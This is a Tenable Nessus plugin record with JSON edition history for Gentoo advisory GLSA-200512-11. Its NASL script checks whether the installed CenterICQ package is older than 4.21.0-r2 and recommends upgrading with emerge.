ID GENTOO_GLSA-200512-11.NASL Type nessus Reporter Tenable Modified 2018-08-10T00:00:00
Description
The remote host is affected by the vulnerability described in GLSA-200512-11 (CenterICQ: Multiple vulnerabilities)
Gentoo developer Wernfried Haas discovered that when the 'Enable peer-to-peer communications' option is enabled, CenterICQ opens a port that insufficiently validates whatever is sent to it. Furthermore, Zone-H Research reported a buffer overflow in the ktools library.
Impact :
A remote attacker could cause a crash of CenterICQ by sending packets to the peer-to-peer communications port, and potentially cause the execution of arbitrary code by enticing a CenterICQ user to edit overly long contact details.
Workaround :
There is no known workaround at this time.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 200512-11.
#
# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#
include("compat.inc");
if (description)
{
script_id(20352);
script_version("1.13");
script_cvs_date("Date: 2018/08/10 18:07:06");
script_cve_id("CVE-2005-3694", "CVE-2005-3863");
script_xref(name:"GLSA", value:"200512-11");
script_name(english:"GLSA-200512-11 : CenterICQ: Multiple vulnerabilities");
script_summary(english:"Checks for updated package(s) in /var/db/pkg");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Gentoo host is missing one or more security-related
patches."
);
script_set_attribute(
attribute:"description",
value:
"The remote host is affected by the vulnerability described in GLSA-200512-11
(CenterICQ: Multiple vulnerabilities)
Gentoo developer Wernfried Haas discovered that when the 'Enable
peer-to-peer communications' option is enabled, CenterICQ opens a port
that insufficiently validates whatever is sent to it. Furthermore,
Zone-H Research reported a buffer overflow in the ktools library.
Impact :
A remote attacker could cause a crash of CenterICQ by sending
packets to the peer-to-peer communications port, and potentially cause
the execution of arbitrary code by enticing a CenterICQ user to edit
overly long contact details.
Workaround :
There is no known workaround at this time."
);
script_set_attribute(
attribute:"see_also",
value:"http://www.zone-h.org/en/advisories/read/id=8480/"
);
script_set_attribute(
attribute:"see_also",
value:"https://security.gentoo.org/glsa/200512-11"
);
script_set_attribute(
attribute:"solution",
value:
"All CenterICQ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose '>=net-im/centericq-4.21.0-r2'"
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:centericq");
script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
script_set_attribute(attribute:"patch_publication_date", value:"2005/12/20");
script_set_attribute(attribute:"plugin_publication_date", value:"2005/12/30");
script_set_attribute(attribute:"vuln_publication_date", value:"2005/11/26");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
script_family(english:"Gentoo Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
flag = 0;
if (qpkg_check(package:"net-im/centericq", unaffected:make_list("ge 4.21.0-r2"), vulnerable:make_list("lt 4.21.0-r2"))) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = qpkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "CenterICQ");
}
{"id": "GENTOO_GLSA-200512-11.NASL", "bulletinFamily": "scanner", "title": "GLSA-200512-11 : CenterICQ: Multiple vulnerabilities", "description": "The remote host is affected by the vulnerability described in GLSA-200512-11 (CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable peer-to-peer communications' option is enabled, CenterICQ opens a port that insufficiently validates whatever is sent to it. Furthermore, Zone-H Research reported a buffer overflow in the ktools library.\n Impact :\n\n A remote attacker could cause a crash of CenterICQ by sending packets to the peer-to-peer communications port, and potentially cause the execution of arbitrary code by enticing a CenterICQ user to edit overly long contact details.\n Workaround :\n\n There is no known workaround at this time.", "published": "2005-12-30T00:00:00", "modified": "2018-08-10T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=20352", "reporter": "Tenable", "references": ["http://www.zone-h.org/en/advisories/read/id=8480/", "https://security.gentoo.org/glsa/200512-11"], "cvelist": ["CVE-2005-3863", "CVE-2005-3694"], "type": "nessus", "lastseen": "2019-02-21T01:08:53", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:centericq"], "cvelist": ["CVE-2005-3863", "CVE-2005-3694"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "The remote host is affected by the vulnerability described in GLSA-200512-11 (CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable peer-to-peer communications' option is enabled, CenterICQ opens a port that insufficiently validates whatever is sent to it. Furthermore, Zone-H Research reported a buffer overflow in the ktools library.\n Impact :\n\n A remote attacker could cause a crash of CenterICQ by sending packets to the peer-to-peer communications port, and potentially cause the execution of arbitrary code by enticing a CenterICQ user to edit overly long contact details.\n Workaround :\n\n There is no known workaround at this time.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "bd25ca2d40b856a1a3ff0c354fcf3afa84c58473f84ea7004649ca4a10b192fe", "hashmap": [{"hash": "7e65482599b83fc15ece589648b06866", "key": "cvelist"}, {"hash": "ed3111898fb94205e2b64cefef5a2081", "key": "cvss"}, {"hash": "9cb2545dca559a2ee716978081db0d83", "key": "sourceData"}, {"hash": "6d0515ee016b9d3727c3147cf4a384b0", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "a249ff272a04bd91cb5626e5a7f1e171", "key": "cpe"}, {"hash": "e138b9d07bbf3c2599258a9f8ba3765e", "key": "published"}, {"hash": "2693b86d477bff5ce5a0f6221e137f0d", "key": "pluginID"}, {"hash": "0e58ae5ac6f7e085794e2313622ce2d9", "key": "description"}, {"hash": "326af443ca0c41e91daa171ff124ce60", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1078098c5bd5e74513961f5758cc5914", "key": "title"}, {"hash": "99cd0c74dac24ed460ccddb58e649ac1", "key": "href"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=20352", "id": "GENTOO_GLSA-200512-11.NASL", "lastseen": "2017-10-29T13:45:16", "modified": "2015-04-13T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "20352", "published": "2005-12-30T00:00:00", "references": ["http://www.zone-h.org/en/advisories/read/id=8480/", "https://security.gentoo.org/glsa/200512-11"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200512-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20352);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2015/04/13 13:49:34 $\");\n\n script_cve_id(\"CVE-2005-3694\", \"CVE-2005-3863\");\n script_osvdb_id(21161, 21270);\n script_xref(name:\"GLSA\", value:\"200512-11\");\n\n script_name(english:\"GLSA-200512-11 : CenterICQ: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200512-11\n(CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable\n peer-to-peer communications' option is enabled, CenterICQ opens a port\n that insufficiently validates whatever is sent to it. Furthermore,\n Zone-H Research reported a buffer overflow in the ktools library.\n \nImpact :\n\n A remote attacker could cause a crash of CenterICQ by sending\n packets to the peer-to-peer communications port, and potentially cause\n the execution of arbitrary code by enticing a CenterICQ user to edit\n overly long contact details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.zone-h.org/en/advisories/read/id=8480/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200512-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All CenterICQ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/centericq-4.21.0-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:centericq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/12/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-im/centericq\", unaffected:make_list(\"ge 4.21.0-r2\"), vulnerable:make_list(\"lt 4.21.0-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"CenterICQ\");\n}\n", "title": "GLSA-200512-11 : CenterICQ: Multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:45:16"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:centericq"], "cvelist": ["CVE-2005-3863", "CVE-2005-3694"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "The remote host is affected by the vulnerability described in GLSA-200512-11 (CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable peer-to-peer communications' option is enabled, CenterICQ opens a port that insufficiently validates whatever is sent to it. Furthermore, Zone-H Research reported a buffer overflow in the ktools library.\n Impact :\n\n A remote attacker could cause a crash of CenterICQ by sending packets to the peer-to-peer communications port, and potentially cause the execution of arbitrary code by enticing a CenterICQ user to edit overly long contact details.\n Workaround :\n\n There is no known workaround at this time.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "85fa053598ead06829b03f8a13d424e44d407efb2bfcffe14db2899811e21df2", "hashmap": [{"hash": "7e65482599b83fc15ece589648b06866", "key": "cvelist"}, {"hash": "9c6fe61712654f56360b12011e3de300", "key": "modified"}, {"hash": "ed3111898fb94205e2b64cefef5a2081", "key": "cvss"}, {"hash": "6d0515ee016b9d3727c3147cf4a384b0", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "a249ff272a04bd91cb5626e5a7f1e171", "key": "cpe"}, {"hash": "e138b9d07bbf3c2599258a9f8ba3765e", "key": "published"}, {"hash": "2693b86d477bff5ce5a0f6221e137f0d", "key": "pluginID"}, {"hash": "96011a0ab24b3b296fc200b97cec2eb2", "key": "sourceData"}, {"hash": "0e58ae5ac6f7e085794e2313622ce2d9", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1078098c5bd5e74513961f5758cc5914", "key": "title"}, {"hash": "99cd0c74dac24ed460ccddb58e649ac1", "key": "href"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=20352", "id": "GENTOO_GLSA-200512-11.NASL", "lastseen": "2018-09-02T00:08:41", "modified": "2018-08-10T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "20352", "published": "2005-12-30T00:00:00", "references": ["http://www.zone-h.org/en/advisories/read/id=8480/", "https://security.gentoo.org/glsa/200512-11"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200512-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20352);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2005-3694\", \"CVE-2005-3863\");\n script_xref(name:\"GLSA\", value:\"200512-11\");\n\n script_name(english:\"GLSA-200512-11 : CenterICQ: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200512-11\n(CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable\n peer-to-peer communications' option is enabled, CenterICQ opens a port\n that insufficiently validates whatever is sent to it. Furthermore,\n Zone-H Research reported a buffer overflow in the ktools library.\n \nImpact :\n\n A remote attacker could cause a crash of CenterICQ by sending\n packets to the peer-to-peer communications port, and potentially cause\n the execution of arbitrary code by enticing a CenterICQ user to edit\n overly long contact details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.zone-h.org/en/advisories/read/id=8480/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200512-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All CenterICQ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/centericq-4.21.0-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:centericq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/12/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-im/centericq\", unaffected:make_list(\"ge 4.21.0-r2\"), vulnerable:make_list(\"lt 4.21.0-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"CenterICQ\");\n}\n", "title": "GLSA-200512-11 : CenterICQ: Multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 5, "lastseen": "2018-09-02T00:08:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2005-3863", "CVE-2005-3694"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "The remote host is affected by the vulnerability described in GLSA-200512-11 (CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable peer-to-peer communications' option is enabled, CenterICQ opens a port that insufficiently validates whatever is sent to it. Furthermore, Zone-H Research reported a buffer overflow in the ktools library.\n Impact :\n\n A remote attacker could cause a crash of CenterICQ by sending packets to the peer-to-peer communications port, and potentially cause the execution of arbitrary code by enticing a CenterICQ user to edit overly long contact details.\n Workaround :\n\n There is no known workaround at this time.", "edition": 1, "enchantments": {}, "hash": "4e8fb98f3f76bf787a834ca2cb7d13b66b9902d79c223fa64d005b51f0a0e10a", "hashmap": [{"hash": "7e65482599b83fc15ece589648b06866", "key": "cvelist"}, {"hash": "ed3111898fb94205e2b64cefef5a2081", "key": "cvss"}, {"hash": "9cb2545dca559a2ee716978081db0d83", "key": "sourceData"}, {"hash": "6d0515ee016b9d3727c3147cf4a384b0", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e138b9d07bbf3c2599258a9f8ba3765e", "key": "published"}, {"hash": "2693b86d477bff5ce5a0f6221e137f0d", "key": "pluginID"}, {"hash": "0e58ae5ac6f7e085794e2313622ce2d9", "key": "description"}, {"hash": "326af443ca0c41e91daa171ff124ce60", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1078098c5bd5e74513961f5758cc5914", "key": "title"}, {"hash": "99cd0c74dac24ed460ccddb58e649ac1", "key": "href"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=20352", "id": "GENTOO_GLSA-200512-11.NASL", "lastseen": "2016-09-26T17:26:34", "modified": "2015-04-13T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.2", "pluginID": "20352", "published": "2005-12-30T00:00:00", "references": ["http://www.zone-h.org/en/advisories/read/id=8480/", "https://security.gentoo.org/glsa/200512-11"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200512-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20352);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2015/04/13 13:49:34 $\");\n\n script_cve_id(\"CVE-2005-3694\", \"CVE-2005-3863\");\n script_osvdb_id(21161, 21270);\n script_xref(name:\"GLSA\", value:\"200512-11\");\n\n script_name(english:\"GLSA-200512-11 : CenterICQ: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200512-11\n(CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable\n peer-to-peer communications' option is enabled, CenterICQ opens a port\n that insufficiently validates whatever is sent to it. Furthermore,\n Zone-H Research reported a buffer overflow in the ktools library.\n \nImpact :\n\n A remote attacker could cause a crash of CenterICQ by sending\n packets to the peer-to-peer communications port, and potentially cause\n the execution of arbitrary code by enticing a CenterICQ user to edit\n overly long contact details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.zone-h.org/en/advisories/read/id=8480/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200512-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All CenterICQ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/centericq-4.21.0-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:centericq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/12/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-im/centericq\", unaffected:make_list(\"ge 4.21.0-r2\"), vulnerable:make_list(\"lt 4.21.0-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"CenterICQ\");\n}\n", "title": "GLSA-200512-11 : CenterICQ: Multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:26:34"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:centericq"], "cvelist": ["CVE-2005-3863", "CVE-2005-3694"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "The remote host is affected by the vulnerability described in GLSA-200512-11 (CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable peer-to-peer communications' option is enabled, CenterICQ opens a port that insufficiently validates whatever is sent to it. Furthermore, Zone-H Research reported a buffer overflow in the ktools library.\n Impact :\n\n A remote attacker could cause a crash of CenterICQ by sending packets to the peer-to-peer communications port, and potentially cause the execution of arbitrary code by enticing a CenterICQ user to edit overly long contact details.\n Workaround :\n\n There is no known workaround at this time.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "85fa053598ead06829b03f8a13d424e44d407efb2bfcffe14db2899811e21df2", "hashmap": [{"hash": "7e65482599b83fc15ece589648b06866", "key": "cvelist"}, {"hash": "9c6fe61712654f56360b12011e3de300", "key": "modified"}, {"hash": "ed3111898fb94205e2b64cefef5a2081", "key": "cvss"}, {"hash": "6d0515ee016b9d3727c3147cf4a384b0", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "a249ff272a04bd91cb5626e5a7f1e171", "key": "cpe"}, {"hash": "e138b9d07bbf3c2599258a9f8ba3765e", "key": "published"}, {"hash": "2693b86d477bff5ce5a0f6221e137f0d", "key": "pluginID"}, {"hash": "96011a0ab24b3b296fc200b97cec2eb2", "key": "sourceData"}, {"hash": "0e58ae5ac6f7e085794e2313622ce2d9", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1078098c5bd5e74513961f5758cc5914", "key": "title"}, {"hash": "99cd0c74dac24ed460ccddb58e649ac1", "key": "href"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=20352", "id": "GENTOO_GLSA-200512-11.NASL", "lastseen": "2018-08-11T09:35:47", "modified": "2018-08-10T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "20352", "published": "2005-12-30T00:00:00", "references": ["http://www.zone-h.org/en/advisories/read/id=8480/", "https://security.gentoo.org/glsa/200512-11"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200512-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20352);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2005-3694\", \"CVE-2005-3863\");\n script_xref(name:\"GLSA\", value:\"200512-11\");\n\n script_name(english:\"GLSA-200512-11 : CenterICQ: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200512-11\n(CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable\n peer-to-peer communications' option is enabled, CenterICQ opens a port\n that insufficiently validates whatever is sent to it. Furthermore,\n Zone-H Research reported a buffer overflow in the ktools library.\n \nImpact :\n\n A remote attacker could cause a crash of CenterICQ by sending\n packets to the peer-to-peer communications port, and potentially cause\n the execution of arbitrary code by enticing a CenterICQ user to edit\n overly long contact details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.zone-h.org/en/advisories/read/id=8480/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200512-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All CenterICQ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/centericq-4.21.0-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:centericq\");\n 